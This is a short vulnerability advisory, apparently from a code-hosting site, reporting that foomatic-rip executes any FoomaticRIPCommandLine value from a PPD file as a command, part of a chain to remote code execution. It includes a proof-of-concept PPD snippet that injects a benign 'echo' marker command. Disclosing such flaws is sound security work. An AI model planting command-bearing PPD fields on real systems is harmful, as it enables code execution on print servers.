Any value passed to FoomaticRIPCommandLine via a PPD file will be executed as a user controlled command.
Any value passed to FoomaticRIPCommandLine via a PPD file will be executed as a user controlled command and, when combined with other logic bugs, this can lead to RCE.
*PPD-Adobe: "4.3"
*FormatVersion: "4.3"
*FileVersion: "2.0.0"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PSVersion: "(3010.000) 0"
...
...
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "echo 1 > /tmp/VULNERABLE"
...
...
*DefaultResolution: 300dpi`
Code execution.
evilsocket Reporter
Summary
Any value passed to FoomaticRIPCommandLine via a PPD file will be executed as a user controlled command.
Details
Any value passed to FoomaticRIPCommandLine via a PPD file will be executed as a user controlled command and, when combined with other logic bugs, this can lead to RCE.
PoC
This bug is part of an exploit chain leading to RCE described here.
Impact
Code execution.